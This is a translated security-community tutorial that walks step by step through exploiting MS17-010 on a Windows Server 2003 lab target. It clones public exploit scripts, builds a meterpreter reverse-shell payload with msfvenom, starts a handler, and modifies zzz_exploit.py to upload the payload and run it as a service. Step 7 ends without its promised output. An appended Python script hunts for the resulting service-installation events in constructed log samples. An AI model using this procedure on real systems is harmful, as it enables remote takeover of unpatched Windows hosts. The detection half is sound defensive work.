This article is published exclusively by the Xianzhi technical community (先知技术社区); contact the community for authorization before reposting. Do not repost without authorization.
Test environment:
Attacker: Kali 2016.2 virtual machine. Target: Windows Server 2003 (x86).
1. Download the MS17-010 exploit scripts:

```bash
git clone https://github.com/worawit/MS17-010/
```

2. Use checker.py to find a named pipe on the target that the exploit can reach (it also reports whether the host looks patched). zzz_exploit.py needs the name of one accessible pipe; on this target the usable pipe is netlogon:

```bash
python checker.py 192.168.99.249
```
3. On Kali, generate an msf reverse-shell executable (LHOST and LPORT must be reachable from the target):

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.86 LPORT=3333 -f exe -o /opt/shell.exe
```
4. Start an msf handler for the reverse shell (exploit -j runs it as a background job so the console stays free):

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 3333
msf exploit(handler) > set lhost 10.0.0.86
msf exploit(handler) > exploit -j
```
5. Edit the smb_pwn() callback in zzz_exploit.py. The script calls it once the SMB session has been elevated; the repo's stock body only creates C:\pwned.txt as a write test, so add the upload of the payload and its execution through a service:

```python
def smb_pwn(conn, arch):
    # conn: the SMB session the exploit has elevated; arch: target bitness
    smbConn = conn.get_smbconnection()

    # the repo's write test: touch C:\pwned.txt through the C$ share (optional)
    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

    # upload the msfvenom payload to C:\shell.exe and start it via a temporary service
    smb_send_file(smbConn, '/opt/shell.exe', 'C', '/shell.exe')
    service_exec(conn, r'cmd /c c:\shell.exe')  # original post wrote c://shell.exe
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."
```

Two caveats. The payload is launched as a service process, so a plain `-f exe` binary may be torn down by the Service Control Manager when it fails to answer the start request and the session can drop; that is why the script's own comment points at `-f exe-service`, and in any case migrate to another process as soon as the session opens. Also, this is noisy: it writes pwned.txt and shell.exe to the root of C:, and every service_exec call leaves a service-installation record in the target's System event log with `cmd /c c:\shell.exe` as the binary path.
6. Run zzz_exploit.py against the target, passing the pipe name found in step 2:

```bash
python zzz_exploit.py 192.168.99.249 netlogon
```
7. Finally, the msf handler shows the meterpreter session that the target opened back to it:
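The flip side of the procedure above is what it leaves behind. The following is an added example, not code from the original post or from the MS17-010 repository: it runs a small hunt over constructed System-log records modelled on event 7045 ("A service was installed in the system") and flags the service that service_exec() registers for `cmd /c c://shell.exe`. The key=value rendering of the event fields is my own, the sample lines are constructed, and the assumption that service_exec() uses a short random service name should be checked against the script you actually run.

```python
"""Hunt for the service-installation traces this procedure leaves in the target's System event log."""
import re
from dataclasses import dataclass

# Constructed sample records (not real logs): a key=value rendering of the
# fields carried by Windows System-log event 7045. Record 2 is what
# service_exec() in zzz_exploit.py leaves behind for the command used on this
# page; the short random service name is an assumption about that helper.
SAMPLE_7045 = r'''
EventID=7045 ServiceName=Spooler ImagePath="C:\Windows\System32\spoolsv.exe" StartType=auto Account=LocalSystem
EventID=7045 ServiceName=qZvt ImagePath="cmd /c c://shell.exe" StartType=demand Account=LocalSystem
EventID=7045 ServiceName=BackupAgent ImagePath="C:\Program Files\Backup\agent.exe -service" StartType=auto Account="NT AUTHORITY\NetworkService"
EventID=7045 ServiceName=XwRb ImagePath="%COMSPEC% /b /c start /b /min C:\Windows\Temp\a.exe" StartType=demand Account=LocalSystem
EventID=7036 ServiceName=Spooler State=running
'''

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# interpreters used to start a "service binary" instead of a real service executable
SHELL_LAUNCHERS = {'cmd', 'cmd.exe', '%comspec%', 'powershell', 'powershell.exe'}
# an .exe sitting directly under a drive root, e.g. c:\shell.exe
ROOT_EXE_RE = re.compile(r'(?<![\w\\])[a-z]:\\[^\\\s]+\.exe\b')


def parse_record(line):
    """Split one key=value line into a dict, dropping the quotes around quoted values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def normalise_path(image_path):
    r"""Lower-case and turn c://shell.exe into c:\shell.exe (Windows collapses the extra slash)."""
    return re.sub(r'(?<=:)/+', lambda m: '\\', image_path).lower()


def assess_service(record):
    """Return the reasons a 7045 record looks like SMB remote-execution tradecraft (empty = benign)."""
    reasons = []
    path = normalise_path(record.get('ImagePath', ''))
    name = record.get('ServiceName', '')
    tokens = path.split()
    launcher = tokens[0].rsplit('\\', 1)[-1] if tokens else ''
    if launcher in SHELL_LAUNCHERS:
        reasons.append('service binary is an interpreter (%s), not a service executable' % launcher)
    if ROOT_EXE_RE.search(path) or '\\temp\\' in path:
        reasons.append('payload lives in a drive root or a temp directory')
    if 0 < len(name) <= 4 and name.isalpha():
        reasons.append('short random-looking service name')
    return reasons


@dataclass
class Finding:
    service: str
    image_path: str
    reasons: list


def hunt(log_text):
    """Run assess_service over every 7045 record in the text and keep the suspicious ones."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_record(line)
        if rec.get('EventID') != '7045':
            continue
        reasons = assess_service(rec)
        if reasons:
            findings.append(Finding(rec.get('ServiceName', ''), rec.get('ImagePath', ''), reasons))
    return findings


if __name__ == '__main__':
    for f in hunt(SAMPLE_7045):
        print('%-12s %s' % (f.service, f.image_path))
        for r in f.reasons:
            print('    - ' + r)
```

Run stand-alone it reports qZvt and XwRb and leaves Spooler and BackupAgent alone. The three heuristics are deliberately independent so that a single one (for example an interpreter as the service binary) is enough to surface a record for review; on a real estate you would feed it exported 7045 events rather than the constructed lines.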

